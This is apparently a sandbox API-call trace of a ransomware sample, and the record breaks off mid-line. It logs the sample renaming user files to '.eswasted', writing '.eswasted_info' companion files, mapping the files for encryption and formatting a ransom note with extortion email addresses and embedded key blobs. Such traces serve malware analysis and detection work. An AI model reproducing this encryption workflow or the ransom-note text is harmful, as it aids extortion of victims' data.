CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0083.415] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312110 | out: pbBuffer=0x1312110) returned 1 [0083.415] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0083.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.eswasted_info" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0083.415] WriteFile (in: hFile=0x130, lpBuffer=0x1312110*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1312110*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0083.416] SetEndOfFile (hFile=0x130) returned 1 [0083.416] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0083.416] lstrcpyW (in: lpString1=0x6f5d32, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.416] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.eswasted" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.eswasted")) returned 1 [0083.417] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.eswasted" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.417] GetLastError () returned 0x5 [0083.417] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.eswasted" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.eswasted")) returned 0x23 [0083.417] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.eswasted", dwFileAttributes=0x22) returned 1 [0083.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.eswasted" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0083.418] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0083.418] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.eswasted", dwFileAttributes=0x23) returned 1 [0083.418] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0083.418] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0083.419] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0083.419] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0083.419] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0083.420] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0083.420] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0083.428] SetEndOfFile (hFile=0x130) returned 1 [0083.430] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0083.430] CloseHandle (hObject=0x130) returned 1 [0083.431] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0083.432] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0083.432] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0083.432] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0083.432] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 51 [0083.432] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x270) returned 0x6f5cc0 [0083.433] lstrcpyW (in: lpString1=0x6f5d26, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.433] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312110 [0083.433] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0083.433] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312110 | out: pbBuffer=0x1312110) returned 1 [0083.433] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0083.433] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.eswasted_info" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0084.867] WriteFile (in: hFile=0x130, lpBuffer=0x1312110*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1312110*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0084.868] SetEndOfFile (hFile=0x130) returned 1 [0084.868] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.868] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0084.868] lstrcpyW (in: lpString1=0x6f5d26, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0084.869] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.eswasted" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.eswasted")) returned 1 [0084.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.eswasted" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0084.870] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0085.456] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0085.457] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0085.457] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0085.457] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0085.458] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0085.458] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0085.472] SetEndOfFile (hFile=0x130) returned 1 [0085.475] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0085.475] CloseHandle (hObject=0x130) returned 1 [0085.476] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0085.476] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0085.477] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0085.477] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0085.477] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned 50 [0085.477] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x26e) returned 0x6f5cc0 [0085.477] lstrcpyW (in: lpString1=0x6f5d24, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0085.477] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312050 [0085.478] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0085.478] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312050 | out: pbBuffer=0x1312050) returned 1 [0085.478] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0085.478] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.eswasted_info" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0085.479] WriteFile (in: hFile=0x130, lpBuffer=0x1312050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1312050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0085.481] SetEndOfFile (hFile=0x130) returned 1 [0085.481] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.481] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312050 | out: hHeap=0x6d0000) returned 1 [0085.481] lstrcpyW (in: lpString1=0x6f5d24, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0085.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.eswasted" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.eswasted")) returned 1 [0085.521] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.eswasted" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0085.521] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0097.061] UnmapViewOfFile (lpBaseAddress=0x1a00000) returned 1 [0097.304] CloseHandle (hObject=0x11c) returned 1 [0097.304] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0097.304] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f0e0) returned 1 [0097.305] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0097.305] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.305] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f0e0) returned 1 [0097.306] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0097.363] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.373] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x73a000 [0097.373] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0097.373] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312050 [0097.373] _snwprintf (in: _Dest=0x1312050, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Ir5HJKugjsorGjIftRSy+BUADTHjHKWxGx+NRdlvZqDQavA3VDTdxFtfD8qXScpw\r\nZ67JVzjop8SPPMInUoy7xK4OgJk2GozC/t9eDRlghu8QeLAr0HcP0ETSOMbUDS7a\r\nZWdRYHOB4FAWpiFwd8kzXWO5u9+vI2PWELYZmPetjWCbRhT/d3Rj01GXjCu/gqFu\r\n+htucJECD+nqQpW1Ga0fJ9c2ezZ35h4ysb1heQ5+GstaZ7RCrMY0Vt+WeCqEMnxL\r\nTtwva1KpMZn4ITmhR6GjhQ8b9Na2i7mkibwEDAtBFlrZQ92mnfC9kJsSbZNs8BUh\r\ndurXHe6vL8tN10P9LOCdqSCM6jLPKT6PQMEM7Vu43DARGjdph2n24G4WuIVDXbq0\r\nGZ/bqjw8jee7ZQsHfPGyhc8wG7ip7eI65bi3W6+o+059ypNV3TEFlsRJNYKq4qKx\r\nZAYoLq3zRP0ghT9qn8+EkZ39uUC5UMJ9Wzj7fRItPBZcX2ixjz2Rxa1DrSWQz1VA\r\nTvu6fUhIXPUU59tnR+nga9QNO3OLSR9uY6yKjxvwX59sh7b2pOuNiVwBgzkdO7Ji\r\nx9XnG4Cq3Iudf0DYB14u/J/+fl+OHGpc4R7XEnsll5iDeVRZwXxjL8Gx4GHYQOxr\r\nCN7dLeqMRbh3mIh6NAm7QhZ7bYL3s1k9yONXgzzzzgz=[end_key]\r\nKEEP IT\r\n") returned 990 [0097.373] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a000 | out: hHeap=0x6d0000) returned 1 [0097.373] WriteFile (in: hFile=0x130, lpBuffer=0x1312050*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x114fe38, lpOverlapped=0x0 | out: lpBuffer=0x1312050*, lpNumberOfBytesWritten=0x114fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0097.374] SetEndOfFile (hFile=0x130) returned 1 [0097.376] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312050 | out: hHeap=0x6d0000) returned 1 [0097.376] CloseHandle (hObject=0x130) returned 1 [0097.378] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0097.378] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x738b60 | out: hHeap=0x6d0000) returned 1 [0097.378] _aulldvrm () returned 0x0 [0097.378] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f0e0) returned 1 [0097.379] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0097.379] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.379] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned 55 [0097.379] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x278) returned 0x6f5cc0 [0097.379] lstrcpyW (in: lpString1=0x6f5d2e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0097.379] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312050 [0097.379] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f0e0) returned 1 [0097.380] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0xa46, pbBuffer=0x1312050 | out: pbBuffer=0x1312050) returned 1 [0097.380] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.eswasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0097.381] WriteFile (in: hFile=0x130, lpBuffer=0x1312050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1312050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0097.382] SetEndOfFile (hFile=0x130) returned 1 [0097.382] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.382] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312050 | out: hHeap=0x6d0000) returned 1 [0097.382] lstrcpyW (in: lpString1=0x6f5d2e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0097.382] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.eswasted")) returned 1 [0097.383] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0097.383] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0097.383] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0xce875 [0097.383] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xce875) returned 0x16f0000 [0097.383] CloseHandle (hObject=0x11c) returned 1 [0097.484] UnmapViewOfFile (lpBaseAddress=0x16f0000) returned 1 [0097.489] CloseHandle (hObject=0x124) returned 1 [0097.489] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0097.489] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f0e0) returned 1 [0097.490] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0097.490] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.490] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f0e0) returned 1 [0097.490] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0097.490] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.499] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x73a000 [0097.499] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0097.499] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312050 [0097.499] _snwprintf (in: _Dest=0x1312050, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]atsWHgvc3L8GaCgh355MTT6BsguK6BZzdToICDIUvm15R7p1TVE0HV6AQienNPj0\r\nYjZFd8J8nnoPFZ54ay6PStRCkU3lfpJ/OKHdCKZJsX0uB0z05rjKlxtFDROdGJek\r\nsHqokfpiNSTHQephJzHSrSvpq+p73tYylVmKkOCeWruDVHXEbRPhdmzIyZTLgNKf\r\n3dlR9Mkdewjkg0UjQxwxDxcgjt0Z9xCVrbjqq9GjrhoZj7Ey/hSZMYW+n9fM6Fx8\r\n77jEKuauaf9B6Hjn6gMV2i3rDe2yedeIwiNkNNSdqYt3o+MXmAs9Nbdi/bk0qhj0\r\nE/JRKfB/va8f6ZC/2amVYysDBWoNs2yo4F2n/WUgQb5Xzs68U1qC6Dng4XRgGxjr\r\nSC3bJyQhpnL50WaIyWH3Irzs6MWYqcAb37NeESFDb3nfOQJP3HFer08NWU56saZI\r\nUJlciF7WukBc3ZRqRQJKa82L9dmUDqfllfrbES/zT2JI+qjmmCqyjwHzHYma0qWJ\r\nyX+Jb61f5rqYFaLGdACBiZvydA+I8ZEuxGX5OYgsc8zw4JbIkz0wOaauBKWke7A0\r\nCA1tWzH8OPp+joYsZvQHRybHYkY4NE9Y6gqtuglMYRGbjYLGYj9WWzUvbKcVP+uS\r\nHBrUFjvw21dHrHgz4vhLH5D1qUDIKtJqTAmwdGtaFZF=[end_key]\r\nKEEP IT\r\n") returned 990 [0097.499] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a000 | out: hHeap=0x6d0000) returned 1 [0097.499] WriteFile (in: hFile=0x130, lpBuffer=0x1312050*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x114fe38, lpOverlapped=0x0 | out: lpBuffer=0x1312050*, lpNumberOfBytesWritten=0x114fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0097.500] SetEndOfFile (hFile=0x130) returned 1 [0097.502] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312050 | out: hHeap=0x6d0000) returned 1 [0097.502] CloseHandle (hObject=0x130) returned 1 [0097.530] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0097.530] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x727a68 | out: hHeap=0x6d0000) returned 1 [0097.530] _aulldvrm () returned 0x0 [0097.531] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f0e0) returned 1 [0097.531] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0097.531] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.531] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned 58 [0097.531] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27e) returned 0x6f5cc0 [0097.532] lstrcpyW (in: lpString1=0x6f5d34, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0097.532] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312050 [0097.532] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f0e0) returned 1 [0097.532] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0xa46, pbBuffer=0x1312050 | out: pbBuffer=0x1312050) returned 1 [0097.532] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.eswasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0097.533] WriteFile (in: hFile=0x130, lpBuffer=0x1312050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1312050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0097.588] SetEndOfFile (hFile=0x130) returned 1 [0097.588] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.588] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312050 | out: hHeap=0x6d0000) returned 1 [0097.588] lstrcpyW (in: lpString1=0x6f5d34, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0097.588] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.eswasted")) returned 1 [0097.602] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample 